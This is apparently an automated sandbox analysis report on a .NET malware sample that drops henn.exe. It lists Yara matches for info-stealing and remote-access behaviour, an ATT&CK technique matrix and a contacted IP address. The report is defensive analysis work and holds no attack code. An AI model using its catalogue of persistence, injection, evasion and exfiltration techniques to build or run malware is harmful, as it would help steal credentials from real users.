                    Source: C:\Users\user\AppData\Roaming\henn.exeProcess created: C:\Users\user\AppData\Roaming\henn.exe C:\Users\user\AppData\Roaming\henn.exeJump to behavior
                    Source: C:\Users\user\AppData\Roaming\henn.exeProcess created: C:\Users\user\AppData\Roaming\henn.exe C:\Users\user\AppData\Roaming\henn.exeJump to behavior
                    Source: C:\Users\user\AppData\Roaming\henn.exeProcess created: C:\Users\user\AppData\Roaming\henn.exe C:\Users\user\AppData\Roaming\henn.exeJump to behavior
                    Source: C:\Users\user\AppData\Roaming\henn.exeProcess created: C:\Users\user\AppData\Roaming\henn.exe C:\Users\user\AppData\Roaming\henn.exeJump to behavior
                    Source: C:\Users\user\AppData\Roaming\henn.exeProcess created: C:\Users\user\AppData\Roaming\henn.exe C:\Users\user\AppData\Roaming\henn.exeJump to behavior
                    Source: C:\Users\user\AppData\Roaming\henn.exeProcess created: C:\Users\user\AppData\Roaming\henn.exe C:\Users\user\AppData\Roaming\henn.exeJump to behavior
                    Source: C:\Users\user\AppData\Roaming\henn.exeProcess created: C:\Users\user\AppData\Roaming\henn.exe C:\Users\user\AppData\Roaming\henn.exeJump to behavior
                    Source: C:\Users\user\AppData\Roaming\henn.exeProcess created: C:\Users\user\AppData\Roaming\henn.exe C:\Users\user\AppData\Roaming\henn.exeJump to behavior
                    Source: C:\Users\user\AppData\Roaming\henn.exeProcess created: C:\Users\user\AppData\Roaming\henn.exe C:\Users\user\AppData\Roaming\henn.exeJump to behavior
                    Source: C:\Users\user\AppData\Roaming\henn.exeProcess created: C:\Users\user\AppData\Roaming\henn.exe C:\Users\user\AppData\Roaming\henn.exeJump to behavior
                    Source: C:\Users\user\AppData\Roaming\henn.exeProcess created: C:\Users\user\AppData\Roaming\henn.exe C:\Users\user\AppData\Roaming\henn.exeJump to behavior
                    Source: C:\Users\user\AppData\Roaming\henn.exeProcess created: C:\Users\user\AppData\Roaming\henn.exe C:\Users\user\AppData\Roaming\henn.exeJump to behavior
                    Source: C:\Users\user\AppData\Roaming\henn.exeProcess created: C:\Users\user\AppData\Roaming\henn.exe C:\Users\user\AppData\Roaming\henn.exeJump to behavior
                    Source: C:\Users\user\Desktop\SecuriteInfo.com.MSIL.Generik.FMUPQYX.tr.3045.24667.exeQueries volume information: C:\Users\user\Desktop\SecuriteInfo.com.MSIL.Generik.FMUPQYX.tr.3045.24667.exe VolumeInformationJump to behavior
                    Source: C:\Users\user\AppData\Roaming\henn.exeQueries volume information: C:\Users\user\AppData\Roaming\henn.exe VolumeInformationJump to behavior
                    Source: C:\Users\user\AppData\Roaming\henn.exeQueries volume information: C:\Users\user\AppData\Roaming\henn.exe VolumeInformationJump to behavior
                    Source: C:\Users\user\Desktop\SecuriteInfo.com.MSIL.Generik.FMUPQYX.tr.3045.24667.exeKey value queried: HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Cryptography MachineGuidJump to behavior

                    Stealing of Sensitive Information

                    barindex
                    Source: Yara matchFile source: 0.2.SecuriteInfo.com.MSIL.Generik.FMUPQYX.tr.3045.24667.exe.17c734498b8.5.unpack, type: UNPACKEDPE
                    Source: Yara matchFile source: 0.2.SecuriteInfo.com.MSIL.Generik.FMUPQYX.tr.3045.24667.exe.17c734498b8.5.raw.unpack, type: UNPACKEDPE
                    Source: Yara matchFile source: 24.2.henn.exe.21593116bc0.0.raw.unpack, type: UNPACKEDPE
                    Source: Yara matchFile source: 0.2.SecuriteInfo.com.MSIL.Generik.FMUPQYX.tr.3045.24667.exe.17c63406e58.3.raw.unpack, type: UNPACKEDPE
                    Source: Yara matchFile source: 0000000C.00000002.2285133162.000001D7BCB6B000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
                    Source: Yara matchFile source: 00000000.00000002.2134316901.0000017C73434000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
                    Source: Yara matchFile source: 00000000.00000002.2133922977.0000017C63332000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
                    Source: Yara matchFile source: 00000018.00000002.2350909702.000002159309E000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
                    Source: Yara matchFile source: Process Memory Space: SecuriteInfo.com.MSIL.Generik.FMUPQYX.tr.3045.24667.exe PID: 5896, type: MEMORYSTR
                    Source: Yara matchFile source: Process Memory Space: henn.exe PID: 5788, type: MEMORYSTR
                    Source: Yara matchFile source: Process Memory Space: henn.exe PID: 4352, type: MEMORYSTR
                    Source: Yara matchFile source: 00000000.00000002.2133922977.0000017C63332000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
                    Source: Yara matchFile source: 00000018.00000002.2350909702.000002159309E000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
                    Source: Yara matchFile source: 0000000C.00000002.2285133162.000001D7BC9A2000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
                    Source: Yara matchFile source: Process Memory Space: SecuriteInfo.com.MSIL.Generik.FMUPQYX.tr.3045.24667.exe PID: 5896, type: MEMORYSTR
                    Source: Yara matchFile source: Process Memory Space: henn.exe PID: 5788, type: MEMORYSTR
                    Source: Yara matchFile source: Process Memory Space: henn.exe PID: 4352, type: MEMORYSTR
                    Source: Yara matchFile source: 0.2.SecuriteInfo.com.MSIL.Generik.FMUPQYX.tr.3045.24667.exe.17c734498b8.5.unpack, type: UNPACKEDPE
                    Source: Yara matchFile source: 0.2.SecuriteInfo.com.MSIL.Generik.FMUPQYX.tr.3045.24667.exe.17c734498b8.5.raw.unpack, type: UNPACKEDPE
                    Source: Yara matchFile source: 24.2.henn.exe.21593116bc0.0.raw.unpack, type: UNPACKEDPE
                    Source: Yara matchFile source: 0.2.SecuriteInfo.com.MSIL.Generik.FMUPQYX.tr.3045.24667.exe.17c63406e58.3.raw.unpack, type: UNPACKEDPE
                    Source: Yara matchFile source: 0000000C.00000002.2285133162.000001D7BCB6B000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
                    Source: Yara matchFile source: 00000000.00000002.2134316901.0000017C73434000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
                    Source: Yara matchFile source: 00000000.00000002.2133922977.0000017C63332000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
                    Source: Yara matchFile source: 00000018.00000002.2350909702.000002159309E000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
                    Source: Yara matchFile source: Process Memory Space: SecuriteInfo.com.MSIL.Generik.FMUPQYX.tr.3045.24667.exe PID: 5896, type: MEMORYSTR
                    Source: Yara matchFile source: Process Memory Space: henn.exe PID: 5788, type: MEMORYSTR
                    Source: Yara matchFile source: Process Memory Space: henn.exe PID: 4352, type: MEMORYSTR

                    Remote Access Functionality

                    barindex
                    Source: Yara matchFile source: 0.2.SecuriteInfo.com.MSIL.Generik.FMUPQYX.tr.3045.24667.exe.17c734498b8.5.unpack, type: UNPACKEDPE
                    Source: Yara matchFile source: 0.2.SecuriteInfo.com.MSIL.Generik.FMUPQYX.tr.3045.24667.exe.17c734498b8.5.raw.unpack, type: UNPACKEDPE
                    Source: Yara matchFile source: 24.2.henn.exe.21593116bc0.0.raw.unpack, type: UNPACKEDPE
                    Source: Yara matchFile source: 0.2.SecuriteInfo.com.MSIL.Generik.FMUPQYX.tr.3045.24667.exe.17c63406e58.3.raw.unpack, type: UNPACKEDPE
                    Source: Yara matchFile source: 0000000C.00000002.2285133162.000001D7BCB6B000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
                    Source: Yara matchFile source: 00000000.00000002.2134316901.0000017C73434000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
                    Source: Yara matchFile source: 00000000.00000002.2133922977.0000017C63332000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
                    Source: Yara matchFile source: 00000018.00000002.2350909702.000002159309E000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
                    Source: Yara matchFile source: Process Memory Space: SecuriteInfo.com.MSIL.Generik.FMUPQYX.tr.3045.24667.exe PID: 5896, type: MEMORYSTR
                    Source: Yara matchFile source: Process Memory Space: henn.exe PID: 5788, type: MEMORYSTR
                    Source: Yara matchFile source: Process Memory Space: henn.exe PID: 4352, type: MEMORYSTR
                    Source: Yara matchFile source: 00000000.00000002.2133922977.0000017C63332000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
                    Source: Yara matchFile source: 00000018.00000002.2350909702.000002159309E000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
                    Source: Yara matchFile source: 0000000C.00000002.2285133162.000001D7BC9A2000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
                    Source: Yara matchFile source: Process Memory Space: SecuriteInfo.com.MSIL.Generik.FMUPQYX.tr.3045.24667.exe PID: 5896, type: MEMORYSTR
                    Source: Yara matchFile source: Process Memory Space: henn.exe PID: 5788, type: MEMORYSTR
                    Source: Yara matchFile source: Process Memory Space: henn.exe PID: 4352, type: MEMORYSTR
                    Initial AccessExecutionPersistencePrivilege EscalationDefense EvasionCredential AccessDiscoveryLateral MovementCollectionExfiltrationCommand and ControlNetwork EffectsRemote Service EffectsImpactResource DevelopmentReconnaissance
                    Valid AccountsWindows Management Instrumentation1
                    Registry Run Keys / Startup Folder
                    11
                    Process Injection
                    1
                    Masquerading
                    1
                    Input Capture
                    21
                    Security Software Discovery
                    Remote Services1
                    Input Capture
                    Exfiltration Over Other Network Medium1
                    Data Obfuscation
                    Exploit SS7 to Redirect Phone Calls/SMSRemotely Wipe Data Without AuthorizationAbuse Accessibility FeaturesAcquire InfrastructureGather Victim Identity Information
                    Default AccountsScheduled Task/JobBoot or Logon Initialization Scripts1
                    Registry Run Keys / Startup Folder
                    1
                    Disable or Modify Tools
                    LSASS Memory1
                    Process Discovery
                    Remote Desktop Protocol11
                    Archive Collected Data
                    Exfiltration Over Bluetooth1
                    Encrypted Channel
                    SIM Card SwapObtain Device Cloud BackupsNetwork Denial of ServiceDomainsCredentials
                    Domain AccountsAtLogon Script (Windows)Logon Script (Windows)21
                    Virtualization/Sandbox Evasion
                    Security Account Manager21
                    Virtualization/Sandbox Evasion
                    SMB/Windows Admin SharesData from Network Shared DriveAutomated Exfiltration1
                    Ingress Tool Transfer
                    Data Encrypted for ImpactDNS ServerEmail Addresses
                    Local AccountsCronLogin HookLogin Hook11
                    Process Injection
                    NTDS12
                    System Information Discovery
                    Distributed Component Object ModelInput CaptureTraffic Duplication1
                    Non-Application Layer Protocol
                    Data DestructionVirtual Private ServerEmployee Names
                    Cloud AccountsLaunchdNetwork Logon ScriptNetwork Logon Script1
                    Deobfuscate/Decode Files or Information
                    LSA SecretsInternet Connection DiscoverySSHKeyloggingScheduled Transfer1
                    Application Layer Protocol
                    Data Encrypted for ImpactServerGather Victim Network Information
                    Replication Through Removable MediaScheduled TaskRC ScriptsRC Scripts1
                    Obfuscated Files or Information
                    Cached Domain CredentialsWi-Fi DiscoveryVNCGUI Input CaptureData Transfer Size LimitsMultiband CommunicationService StopBotnetDomain Properties
                    External Remote ServicesSystemd TimersStartup ItemsStartup Items1
                    Software Packing
                    DCSyncRemote System DiscoveryWindows Remote ManagementWeb Portal CaptureExfiltration Over C2 ChannelCommonly Used PortInhibit System RecoveryWeb ServicesDNS
                    Hide Legend

                    Legend:

                    • Process
                    • Signature
                    • Created File
                    • DNS/IP Info
                    • Is Dropped
                    • Is Windows Process
                    • Number of created Registry Values
                    • Number of created Files
                    • Visual Basic
                    • Delphi
                    • Java
                    • .Net C# or VB.NET
                    • C, C++ or other language
                    • Is malicious
                    • Internet
                    behaviorgraph top1 signatures2 2 Behavior Graph ID: 1361205 Sample: SecuriteInfo.com.MSIL.Gener... Startdate: 13/12/2023 Architecture: WINDOWS Score: 100 42 Multi AV Scanner detection for domain / URL 2->42 44 Found malware configuration 2->44 46 Malicious sample detected (through community Yara rule) 2->46 48 8 other signatures 2->48 7 SecuriteInfo.com.MSIL.Generik.FMUPQYX.tr.3045.24667.exe 15 5 2->7         started        12 henn.exe 14 5 2->12         started        process3 dnsIp4 40 45.137.22.163, 49706, 49707, 49715 ROOTLAYERNETNL Netherlands 7->40 38 C:\Users\user\AppData\Roaming\henn.exe, PE32+ 7->38 dropped 50 Tries to detect sandboxes and other dynamic analysis tools (process name or module or function) 7->50 14 henn.exe 4 7->14         started        16 SecuriteInfo.com.MSIL.Generik.FMUPQYX.tr.3045.24667.exe 7->16         started        18 SecuriteInfo.com.MSIL.Generik.FMUPQYX.tr.3045.24667.exe 7->18         started        26 8 other processes 7->26 52 Multi AV Scanner detection for dropped file 12->52 54 Machine Learning detection for dropped file 12->54 20 henn.exe 12->20         started        22 henn.exe 12->22         started        24 henn.exe 12->24         started        28 7 other processes 12->28 file5 signatures6 process7 process8 30 henn.exe 14->30         started        32 henn.exe 14->32         started        34 henn.exe 14->34         started        36 7 other processes 14->36

                    This section contains all screenshots as thumbnails, including those not shown in the slideshow.